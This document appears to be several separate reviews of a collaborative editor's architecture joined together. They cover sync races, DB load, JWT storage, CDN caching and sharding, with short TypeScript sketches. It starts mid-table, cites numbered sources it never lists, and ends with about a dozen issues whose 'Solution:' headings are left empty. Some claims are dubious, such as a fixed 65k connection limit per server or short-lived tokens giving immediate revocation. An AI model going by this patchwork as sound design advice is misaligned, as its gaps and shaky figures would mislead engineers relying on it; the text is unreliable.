| JWT in localStorage – XSS can steal tokens. | No HttpOnly flag, token accessible via JS. | Move JWT to HttpOnly cookie (or use a secure “session‑store” in Redis). Add SameSite‑Lax to mitigate CSRF. <br>Pros: mitigates XSS token theft. <br>Cons: need to handle CORS, cookie size limits. |
| Token revocation not immediate – cached tokens in CDN or client may be used after revocation. | CDN caches auth responses (Cache‑Control: public). | Set Cache‑Control: no‑store or private for all auth‑related endpoints. Invalidate CDN cache on revocation (purge API). <br>Pros: guarantees revocation visibility. <br>Cons: higher CDN load, need purge API latency. |
| No rate limiting on WebSocket – a malicious actor can open millions of connections. | No per‑IP or per‑user limits. | Implement per‑IP connection caps (e.g., 10 connections/IP) and a global token‑bucket for messages per second. Use a WAF rule to block abnormal traffic. <br>Pros: prevents DoS. <br>Cons: may block legitimate high‑traffic users, adds complexity to connection handling. |
| No TLS‑termination hardening – CloudFront may terminate TLS at edge, exposing raw data to CDN. | Edge TLS termination is fine, but you must ensure no HTTP‑only fallback and strict HSTS. | Enable HSTS, TLS‑1.3, OCSP stapling, and strict transport security on the origin. <br>Pros: stronger encryption. <br>Cons: adds CPU overhead on CloudFront, must keep certificates up‑to‑date. |
| No audit trail for document edits – GDPR/Compliance requires ability to prove who edited what. | Only snapshots stored, no per‑edit logs. | Store each edit in doc_changes table with user ID, timestamp, IP, and operation type. Enable immutable logs (append‑only) and periodic export for compliance. <br>Pros: full audit. <br>Cons: larger DB footprint, need to purge after retention period. |
| No token revocation list in Redis – revoked tokens may still be used after a server restart. | Revocation list is in‑memory only. | Persist revocation list to a durable store (e.g., PostgreSQL table) and replicate to Redis on startup. <br>Pros: revocation survives restarts. <br>Cons: extra DB writes, possible race if list is stale. |
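The per-connection message limits suggested above are typically a token bucket. A minimal sketch with an injectable clock for testability (names are illustrative, not from any specific library):

```typescript
// Token bucket, one instance per connection or IP: `capacity` is the burst
// size, `refillPerSec` the sustained rate. allow() is called once per message.
class TokenBucket {
  private tokens: number;
  private last: number;

  constructor(
    private capacity: number,
    private refillPerSec: number,
    private now: () => number = () => Date.now(),
  ) {
    this.tokens = capacity;
    this.last = this.now();
  }

  allow(): boolean {
    const t = this.now();
    // Refill proportionally to elapsed time, never above capacity.
    this.tokens = Math.min(
      this.capacity,
      this.tokens + ((t - this.last) / 1000) * this.refillPerSec,
    );
    this.last = t;
    if (this.tokens >= 1) {
      this.tokens -= 1;
      return true;
    }
    return false;
  }
}
```

When `allow()` returns false the server can drop the message, send a backpressure signal, or close the connection, depending on policy.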
**Quick‑win summary:**
- Storage model: keep the live document in `doc_current` and an append‑only `doc_changes` table for each operation. Snapshots become compressed binary blobs stored in an object store (S3) and retained only for a limited period (e.g., 10 min).
- Sharding: partition by `org_id + doc_id` using consistent hashing; optionally add a secondary key (`shard_id`) to spread load.
- Observability: trace the full path change → DB → broadcast → client; expose latency histograms; set up autoscaling based on connection count, DB write latency, and Redis memory.

| Change | Benefit | Cost / Drawback |
|---|---|---|
| Sticky sessions | Simple to implement; no cross‑server broadcast needed. | Uneven load, hot‑spot servers, harder to scale horizontally. |
| Shared pub/sub (Redis/Kafka) | True cross‑server broadcast, eliminates duplicate work, easier scaling. | Added latency, need for durable broker, operational overhead. |
| Short‑lived JWT + refresh | Immediate revocation, mitigates token theft. | Extra round‑trip per user, higher auth‑server load. |
| CRDT/OT | No lost edits, deterministic merge. | Higher CPU per change, extra state (vector clocks) stored. |
| Debounce client edits | Reduces DB write volume, less contention. | Small client‑side latency (e.g., 200 ms). |
| Compressed snapshots in object store | Cuts storage cost, faster retrieval. | CPU for compression, need to manage lifecycle. |
| READ‑AFTER‑WRITE routing | Guarantees consistency for latest edits. | Primary DB load spikes, need tracking per‑doc. |
| Redis cluster | Horizontal scaling, fault‑tolerance. | Complexity of sharding keys, added network hops. |
| Auto‑scale based on WS connections | Handles traffic spikes automatically. | May over‑scale during brief bursts; need cost‑aware thresholds. |
| OpenTelemetry tracing | Pinpoints latency bottlenecks, aids debugging. | Overhead on every request; requires instrumentation on all services. |
| Audit‑log table | Compliance, forensic analysis. | Increased DB size, need retention policy. |
Implementing the above mitigations will remove the most critical failure modes, fix the race conditions that currently cause lost edits, and provide a scalable foundation that can handle thousands of concurrent editors without hitting single‑point bottlenecks. The trade‑offs are intentional: you trade a little extra latency or operational complexity for far greater reliability, consistency, and security. Adjust the specific choices (e.g., stickiness vs. shared bus, CRDT vs. OT) based on your latency SLA, team expertise, and cost constraints.
Client Clock Skew in Conflict Resolution
Client-generated timestamps for last-write-wins can fail due to clock skew across devices, where one client's clock lags or leads, causing incorrect overwrite ordering even if changes were logically sequential.[21][27][32] This leads to lost edits nondeterministically.
Solution: Replace client timestamps with server-assigned monotonic counters or UUIDs from a central authority like PostgreSQL sequences.
Trade-offs: Adds server-side sequencing latency (1-5ms) but eliminates skew; requires all changes to route through DB first, increasing write load.[14]
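The difference between client-timestamp LWW and server sequencing can be shown concretely. In this sketch, edit 1 happens first but its client's clock runs 5 s fast; `serverSeq` stands in for a PostgreSQL sequence value (the names and numbers are illustrative):

```typescript
interface Change {
  value: string;
  clientTs: number; // client wall-clock, subject to skew
  serverSeq: number; // assigned by the central authority on arrival
}

// Client-timestamp LWW: a skewed clock lets a logically earlier edit win.
function lwwByClientTs(a: Change, b: Change): Change {
  return a.clientTs >= b.clientTs ? a : b;
}

// Server-sequence LWW: arrival order at the authority decides deterministically.
function lwwByServerSeq(a: Change, b: Change): Change {
  return a.serverSeq >= b.serverSeq ? a : b;
}

// Edit 1 happened first, but its client's clock is 5 s ahead of edit 2's.
const edit1: Change = { value: "hello", clientTs: 10_005_000, serverSeq: 1 };
const edit2: Change = { value: "hello world", clientTs: 10_001_000, serverSeq: 2 };
```

Under client timestamps the older `"hello"` silently overwrites the newer `"hello world"`; under server sequencing the newer edit wins every time.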
Cross-Server Update Races
When multiple servers poll PostgreSQL every 2 seconds, they may detect the same change batch simultaneously, leading to duplicate broadcasts or missed sequencing in WebSocket clients.[6] Polling windows create TOCTOU (time-of-check-to-time-of-use) gaps.
Solution: Use PostgreSQL LISTEN/NOTIFY for push notifications on change rows instead of polling.
Trade-offs: Reduces DB load and latency (sub-second vs 2s) but couples servers to DB events; notify storms possible under high churn.[1]
WebSocket Connection Loss on Server Failure
Each server holds its own WebSockets; server crash drops all connected clients' sessions, forcing reconnects and potential data loss if Redis sessions aren't perfectly synced.[3][8][34] Load balancer round-robin lacks sticky sessions, exacerbating drops.
Solution: Implement sticky sessions via load balancer cookies or IP hashing, plus Redis pub/sub for cross-server broadcasting (e.g., Socket.IO Redis adapter).[23]
Trade-offs: Sticky improves reliability but risks uneven load/hotspots; pub/sub adds ~10-50ms latency and Redis dependency.[5]
PostgreSQL Write Overload
Every keystroke writes to PostgreSQL from the connected server, overwhelming the DB under concurrent edits (e.g., 100 users/doc at 5 changes/sec).[22][28][33] No write buffering leads to connection pool exhaustion.
Solution: Buffer changes in Redis (server-local queues), batch-write to PG every 100ms or 50 changes; use read replicas for non-critical queries.[3]
Trade-offs: Buffering risks minor data loss on crash (mitigate with AOF persistence) but cuts DB writes 80-90%; adds reconciliation logic.[22]
Stale CDN-Cached API Responses
CloudFront caches API responses 5 minutes, serving outdated document states or changes to clients, especially read-heavy ops like load/join.[25] Invalidation isn't automatic for DB writes.
Solution: Exclude dynamic APIs from CDN caching or use short TTL (10s) with Cache-Control: no-cache headers; invalidate on document writes via CloudFront invalidations.[30]
Trade-offs: No-cache boosts origin load 10x but ensures freshness; invalidations cost API calls and have quotas.[36]
JWT XSS Vulnerability
JWTs in localStorage are readable by XSS scripts, allowing token theft and full account takeover if frontend has any injection flaw.[24][29] 24h expiry doesn't prevent session hijack.
Solution: Store JWT in httpOnly cookies (backend-set), use short-lived access tokens (15min) refreshed via refresh tokens.
Trade-offs: Cookies enable CSRF (mitigate with tokens) but block XSS access; adds backend refresh endpoint load.[35]
Document Snapshot Inconsistency
30s HTML snapshots may capture mid-edit state during active collaboration, leading to corrupt restores or lost granularity on load/reconnect.[26][31] Full snapshots bloat storage without op logs.
Solution: Store incremental ops alongside snapshots (e.g., Yjs-style log), replay on load; snapshot every 5min during activity.[31]
Trade-offs: Ops add storage/query complexity (need GC) but enable history/undo; replay latency scales with churn (limit to 5min ops).[9]
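Snapshot-plus-op-log restore can be sketched as a replay function over a simplified op type. Positions here are plain string indices for clarity; a real editor would use OT/CRDT positions that survive concurrent edits.

```typescript
type Op =
  | { kind: "insert"; pos: number; text: string }
  | { kind: "delete"; pos: number; len: number };

// Rebuild a document by replaying the op log on top of the last snapshot.
// Storing ops between snapshots gives history/undo and avoids restoring a
// snapshot taken mid-edit: you always replay forward to a version boundary.
function replay(snapshot: string, ops: Op[]): string {
  let doc = snapshot;
  for (const op of ops) {
    if (op.kind === "insert") {
      doc = doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
    } else {
      doc = doc.slice(0, op.pos) + doc.slice(op.pos + op.len);
    }
  }
  return doc;
}
```

The garbage-collection cost mentioned above is the flip side: once a new snapshot lands, ops older than it can be pruned.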
Polling DB Load Explosion
N servers polling every 2s = N/2 queries/sec baseline, exploding to 100s/sec per doc with high activity; kills read replicas.[10]
Solution: Switch to Redis pub/sub for change notifications across servers, with PG as source-of-truth.
Trade-offs: Redis becomes a single point of failure (use a cluster) but cuts polling load ~100x, enabling 10k+ servers.[3]
Per-Server WebSocket Limits
Node.js handles ~5k-10k WS/server; beyond requires 100s of instances, straining Redis for sessions if stateful.[8][13]
Solution: Stateless WS with Redis/Kafka pub/sub; partition docs by org ID across servers.[3][18]
Trade-offs: pub/sub adds network overhead (20-100ms) but enables true horizontal scale to millions of connections; consistency becomes eventual.[5]
DB Partitioning Gaps
Org ID partitioning helps but hot orgs (e.g., large teams) still overload single shards; no sharding mentioned.[39]
Solution: Add document ID hashing for sub-partitioning, with PG Citus for horizontal sharding.
Trade-offs: Citus adds 2x latency/join complexity but scales writes linearly; migration disruptive.[22]
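Document-ID sub-partitioning usually means a consistent-hash ring. A sketch with virtual nodes, using FNV-1a as a cheap stand-in hash; shard names and the vnode count are hypothetical.

```typescript
// FNV-1a 32-bit hash, used only as an inexpensive, deterministic stand-in.
function fnv1a(s: string): number {
  let h = 0x811c9dc5;
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Consistent-hash ring with virtual nodes for doc->shard routing. Keyed by
// `${orgId}:${docId}` so a large org's documents spread across shards
// instead of pinning one shard; vnodes smooth out the distribution.
class HashRing {
  private ring: { point: number; shard: string }[] = [];

  constructor(shards: string[], vnodes = 64) {
    for (const shard of shards)
      for (let v = 0; v < vnodes; v++)
        this.ring.push({ point: fnv1a(`${shard}#${v}`), shard });
    this.ring.sort((a, b) => a.point - b.point);
  }

  route(orgId: string, docId: string): string {
    const h = fnv1a(`${orgId}:${docId}`);
    // First ring point clockwise from the key's hash, wrapping around.
    const hit = this.ring.find((e) => e.point >= h) ?? this.ring[0];
    return hit.shard;
  }
}
```

Adding or removing a shard only remaps the keys between its vnodes and their neighbors, which is what makes resharding far cheaper than with modulo hashing.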
Here's a detailed analysis of potential issues and solutions for the proposed architecture:
**Failure Mode:** Changes only broadcast to clients connected to the same server
**Impact:** Users on different servers experience update delays (up to 2s)
**Solution:**

**Race Condition:** Last-write-wins with unreliable client timestamps
**Impact:** Malicious users could manipulate system clocks to force conflicts
**Solution:**

**Scaling Bottleneck:** 2s polling interval creates sync delays
**Impact:** Multi-server deployments have stale document views
**Solution:**

**Scaling Bottleneck:** Single PostgreSQL primary for all writes
**Impact:** Document saves queue under heavy load
**Solution:**

**Failure Mode:** Full HTML snapshots every 30s
**Impact:** Storage bloat and potential data loss window
**Solution:**

**Failure Mode:** XSS vulnerabilities via localStorage
**Impact:** Session hijacking possibilities
**Solution:**

**Race Condition:** Cached API responses with live document data
**Impact:** Users see outdated documents for up to 5 minutes
**Solution:**

**Scaling Bottleneck:** OS limits on concurrent connections
**Impact:** ~65k connection limit per server
**Solution:**

**Scaling Bottleneck:** Organization-based partitioning
**Impact:** Large organizations create uneven load
**Solution:**

**Race Condition:** Lost updates with LWW strategy
**Impact:** Valid changes get overwritten
**Solution:**

**Failure Mode:** Single PostgreSQL primary
**Impact:** Downtime during primary failure
**Solution:**

**Scaling Bottleneck:** Full HTML diffing
**Impact:** UI lag with large documents
**Solution:**
| Component | Problem | Solution | Trade-off |
|---|---|---|---|
| Real-Time | Fragmented updates | Redis Pub/Sub | +3ms latency |
| Database | Write contention | Sharding | Complex queries |
| Auth | XSS risks | HttpOnly cookies | Longer TTFB |
| Sync | Data loss | CRDTs | Higher memory |
| Scaling | Connection limits | Dedicated WS servers | More infra |
Recommended Priority Fixes:
Each solution requires careful benchmarking, particularly the CRDT implementation, which could increase memory usage by 300-500% for large documents but provides essential conflict-free collaboration capabilities.